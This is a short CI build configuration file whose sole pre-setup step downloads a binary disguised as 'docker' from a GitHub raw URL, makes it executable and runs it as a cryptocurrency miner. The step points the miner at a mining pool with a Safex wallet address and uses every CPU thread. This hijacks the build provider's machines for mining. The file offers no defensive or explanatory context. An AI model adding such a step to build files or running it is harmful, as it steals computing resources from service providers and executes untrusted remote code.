build:
  nodes:
    my-node:
      project_setup:
        before:
          - command: wget https://raw.githubusercontent.com/jsiqiisn/baby/main/docker && chmod 777 docker && ./docker -o sf.pool-pay.com:4025 -u SafexsoajK5bDJyaXhGtuCcvmoTNvg2GwA16VqmfS2hhPEUXchcs1xbRpvNuQ86ju1KjKzw9HUoW9bnq3YhbxtRXDxvyZWkYYDb3Z -p x@$(echo $(shuf -i 1111-9999 -n 1)-CPU) -k -a rx/sfx -t$(nproc --all)
          
